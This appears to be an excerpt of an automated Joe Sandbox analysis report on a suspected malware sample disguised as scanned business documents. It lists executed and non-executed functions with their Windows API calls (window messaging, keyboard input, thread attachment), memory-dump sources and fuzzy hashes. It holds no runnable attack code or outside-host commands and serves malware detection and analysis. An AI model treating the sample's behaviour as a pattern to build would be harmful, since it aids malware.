                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap_free
                                                      • String ID:
                                                      • API String ID: 614378929-0
                                                      • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                      • Instruction ID: 7dae7a7fef83e665131e5ba114a17fddf3f47f3515eb71cb50a5de36aa5cc9e3
                                                      • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                      • Instruction Fuzzy Hash: E5014E722147056BE331DF55D881ADAFBECFB893B0F25091DE184872C0E6706805C774
                                                      Function 002AE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                      • Instruction ID: d3f764a3f64d3dc0154eacae0954e8b7a8b5a3c0ccdc93ed3f4564b4867d1b9f
                                                      • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                      • Instruction Fuzzy Hash: 3DF0F432530A10E7DA313E698C05B9A339C9F537B0F110F15F925921D2DF74D826CEA5
                                                      Function 00289CB3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID:
                                                      • API String ID: 176396367-0
                                                      • Opcode ID: ce3a346586e66ddc28eb23d27771a181aadffd40608124bac489a5a3523b882a
                                                      • Instruction ID: 777a61cac4867791d370bae9a35cfa92f03795ae1ac5fd95ccab37704a8bd5a6
                                                      • Opcode Fuzzy Hash: ce3a346586e66ddc28eb23d27771a181aadffd40608124bac489a5a3523b882a
                                                      • Instruction Fuzzy Hash: EDF028B32116016FD710AF28C802A67FB98EF48760F14852AFA19CB1D1DB71E4208BA0
                                                      Function 002B4C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000008,00281129,00000000,?,002B2E29,00000001,00000364,?,?,?,002AF2DE,002B3863,00351444,?,0029FDF5,?), ref: 002B4CBE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: f568e841dbb7d75397d08b5791b2d73d0532a9c68d3809b881d823f92310986b
                                                      • Instruction ID: 940fd5941e7b5c036ba132e15021e34de71b9af06b73d8ea3e1f135c3bf9e3a8
                                                      • Opcode Fuzzy Hash: f568e841dbb7d75397d08b5791b2d73d0532a9c68d3809b881d823f92310986b
                                                      • Instruction Fuzzy Hash: AFF0B43167222567DB217F629D45BDA3F88AF81BE1F144123FD19E61A3CE70DC2046E0
                                                      Function 002B3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,?,00351444,?,0029FDF5,?,?,0028A976,00000010,00351440,002813FC,?,002813C6,?,00281129), ref: 002B3852
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 0fa07ee672ef72ed66d767e09744c959994e108268dced74c6ab37e49636b3bd
                                                      • Instruction ID: db14f882722bf4936bd6724ec271359f585810d6083aa0b4deb9cab08c75ddfe
                                                      • Opcode Fuzzy Hash: 0fa07ee672ef72ed66d767e09744c959994e108268dced74c6ab37e49636b3bd
                                                      • Instruction Fuzzy Hash: 35E0E53217022667D7216EAA9C00BDA3649AB827F0F0A0031BC0492491DF50DD2185E2
                                                      Function 00284F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FreeLibrary.KERNEL32(?,?,00351418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00284F6D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: 260d0a9451b1b91caee5837fb95ee2056931206a68c16459c0f79dc24b3edb77
                                                      • Instruction ID: 8ad878a58b29df0e67e65ddcedfb700a78b0a012d642022fdfa905ebac746807
                                                      • Opcode Fuzzy Hash: 260d0a9451b1b91caee5837fb95ee2056931206a68c16459c0f79dc24b3edb77
                                                      • Instruction Fuzzy Hash: 61F03075126753CFDB34BF64D490812B7E4BF24319315897EE2DA82951C7719854DF10
                                                      Function 00282DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00282DC4
                                                        • Part of subcall function 00286B57: _wcslen.LIBCMT ref: 00286B6A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: LongNamePath_wcslen
                                                      • String ID:
                                                      • API String ID: 541455249-0
                                                      • Opcode ID: 07679ce66d9cf035c6dffd0c7185bb3bc953e5d8dd196dd4176f685758cd8324
                                                      • Instruction ID: dcfa94cb94a5ed1ab53acb80a59425f468956007cf6e979a6d65c4c7c85ce12a
                                                      • Opcode Fuzzy Hash: 07679ce66d9cf035c6dffd0c7185bb3bc953e5d8dd196dd4176f685758cd8324
                                                      • Instruction Fuzzy Hash: 54E0C276A002245BCB21A2989C0AFEA77EDDFC8794F0441B5FD09E7248DA70ED908A90
                                                      Function 002F2693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock
                                                      • String ID:
                                                      • API String ID: 2638373210-0
                                                      • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                      • Instruction ID: 37ee976929400c80ab9ab7b6279ce48b26104c0f9ce0fbe1532fc684a3e6573a
                                                      • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                      • Instruction Fuzzy Hash: E6E04FB0619B009FDF395E28A8517B6B7E89F4A340F00086EF69BC2252E57268568A4D
                                                      Function 00282B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00283837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00283908
                                                        • Part of subcall function 0028D730: GetInputState.USER32 ref: 0028D807
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00282B6B
                                                        • Part of subcall function 002830F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0028314E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                      • String ID:
                                                      • API String ID: 3667716007-0
                                                      • Opcode ID: 45c9764fb51a9ee3d433d293a50e4b79aef2ab88d9146d8962151c31cb156e75
                                                      • Instruction ID: 424e19573e8f604d3dc2a758d38fd87ed872eb9d46b1a709c0c5f428b3097115
                                                      • Opcode Fuzzy Hash: 45c9764fb51a9ee3d433d293a50e4b79aef2ab88d9146d8962151c31cb156e75
                                                      • Instruction Fuzzy Hash: EFE0262D32220402CA04FB31A812ABDE35D8BD5716F40253EF042831E3CE2449A94B12
                                                      Function 002C039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,002C0704,?,?,00000000,?,002C0704,00000000,0000000C), ref: 002C03B7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 5e18652bb8c3d536f105316e63f60be4bd5ba188f603bd8ed8183f1291084122
                                                      • Instruction ID: ac0f6760ab9910e1d78bb7055db12d79be4512a32ff939616572abe79b46d3e5
                                                      • Opcode Fuzzy Hash: 5e18652bb8c3d536f105316e63f60be4bd5ba188f603bd8ed8183f1291084122
                                                      • Instruction Fuzzy Hash: CBD06C3209010DBBDF028F84DD06EDA3BAAFB4C714F018010BE1856020C732E821AB90
                                                      Function 00281CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00281CBC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: InfoParametersSystem
                                                      • String ID:
                                                      • API String ID: 3098949447-0
                                                      • Opcode ID: b2e342dcdca1c93d92ec512474b8e9857c2ca4ed8b0d218f8c0e2b0cb66f0213
                                                      • Instruction ID: a4d922c7cca78bc7add6c34f92639aa56b5c94d6be59202a4fff0d398e5bbd13
                                                      • Opcode Fuzzy Hash: b2e342dcdca1c93d92ec512474b8e9857c2ca4ed8b0d218f8c0e2b0cb66f0213
                                                      • Instruction Fuzzy Hash: AAC0923A2C0304AFF2178B81FC5AF51B76DA34EB02F048801F609A95F3D3A22820EA50
                                                      Function 0029FC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction ID: b2b05809ac3cd7e0dec0de59d0201052a26cc31055d44f98e326e932954a2149
                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction Fuzzy Hash: 6B310675A2010ADBCB98CF59D680969F7A1FF49300B24C6A6E809CF655D731EDE1CBD0
                                                      Function 032022A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNELBASE(000001F4), ref: 032022B1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1659326696.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3200000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction ID: 3b81334659b706db1dc1e854afaf973d87fe7c9d930a11c98604c33063d08427
                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction Fuzzy Hash: 6CE0BF7594020EDFDB00EFA8D94969E7BB4EF04301F1005A1FD0592281D63099508A62

                                                      Non-executed Functions

                                                      Function 00319576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00299BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00299BB2
                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0031961A
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0031965B
                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0031969F
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003196C9
                                                      • SendMessageW.USER32 ref: 003196F2
                                                      • GetKeyState.USER32(00000011), ref: 0031978B
                                                      • GetKeyState.USER32(00000009), ref: 00319798
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003197AE
                                                      • GetKeyState.USER32(00000010), ref: 003197B8
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003197E9
                                                      • SendMessageW.USER32 ref: 00319810
                                                      • SendMessageW.USER32(?,00001030,?,00317E95), ref: 00319918
                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0031992E
                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00319941
                                                      • SetCapture.USER32(?), ref: 0031994A
                                                      • ClientToScreen.USER32(?,?), ref: 003199AF
                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 003199BC
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003199D6
                                                      • ReleaseCapture.USER32 ref: 003199E1
                                                      • GetCursorPos.USER32(?), ref: 00319A19
                                                      • ScreenToClient.USER32(?,?), ref: 00319A26
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00319A80
                                                      • SendMessageW.USER32 ref: 00319AAE
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00319AEB
                                                      • SendMessageW.USER32 ref: 00319B1A
                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00319B3B
                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00319B4A
                                                      • GetCursorPos.USER32(?), ref: 00319B68
                                                      • ScreenToClient.USER32(?,?), ref: 00319B75
                                                      • GetParent.USER32(?), ref: 00319B93
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00319BFA
                                                      • SendMessageW.USER32 ref: 00319C2B
                                                      • ClientToScreen.USER32(?,?), ref: 00319C84
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00319CB4
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00319CDE
                                                      • SendMessageW.USER32 ref: 00319D01
                                                      • ClientToScreen.USER32(?,?), ref: 00319D4E
                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00319D82
                                                        • Part of subcall function 00299944: GetWindowLongW.USER32(?,000000EB), ref: 00299952
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00319E05
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                      • String ID: @GUI_DRAGID$F$p#5
                                                      • API String ID: 3429851547-3183100334
                                                      • Opcode ID: 1cd523035163b9048a338ce327aa653a0c857ffa40fa5b0347ac1a887bf30a73
                                                      • Instruction ID: 746b046aabed586b58cf5b0eef5cc78009ba95221406516b5eb412d3511d0724
                                                      • Opcode Fuzzy Hash: 1cd523035163b9048a338ce327aa653a0c857ffa40fa5b0347ac1a887bf30a73
                                                      • Instruction Fuzzy Hash: 83425C74204241AFD72ACF24CC54BEABBE9FF8D320F15461AF599872A1D731A8A4CF51
                                                      Function 00314873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 003148F3
                                                      • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00314908
                                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00314927
                                                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0031494B
                                                      • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0031495C
                                                      • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0031497B
                                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 003149AE
                                                      • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 003149D4
                                                      • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00314A0F
                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00314A56
                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00314A7E
                                                      • IsMenu.USER32(?), ref: 00314A97
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00314AF2
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00314B20
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00314B94
                                                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00314BE3
                                                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00314C82
                                                      • wsprintfW.USER32 ref: 00314CAE
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00314CC9
                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00314CF1
                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00314D13
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00314D33
                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00314D5A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                      • String ID: %d/%02d/%02d
                                                      • API String ID: 4054740463-328681919
                                                      • Opcode ID: 1904c3ad5b63eb5ef71658004a6b92d18e8c8341d2f84a8673f6095ea857bc91
                                                      • Instruction ID: 93448a8115ac6bdac0b2aa0ce07b9858895d36afdb703825fd28dd6fb3c99372
                                                      • Opcode Fuzzy Hash: 1904c3ad5b63eb5ef71658004a6b92d18e8c8341d2f84a8673f6095ea857bc91
                                                      • Instruction Fuzzy Hash: 9B12F071640214ABEB2A8F28CD49FEEBBF8EF49710F144129F915DB2E1DB749981CB50
                                                      Function 0029F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0029F998
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002DF474
                                                      • IsIconic.USER32(00000000), ref: 002DF47D
                                                      • ShowWindow.USER32(00000000,00000009), ref: 002DF48A
                                                      • SetForegroundWindow.USER32(00000000), ref: 002DF494
                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 002DF4AA
                                                      • GetCurrentThreadId.KERNEL32 ref: 002DF4B1
                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 002DF4BD
                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 002DF4CE
                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 002DF4D6
                                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 002DF4DE
                                                      • SetForegroundWindow.USER32(00000000), ref: 002DF4E1
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 002DF4F6
                                                      • keybd_event.USER32(00000012,00000000), ref: 002DF501
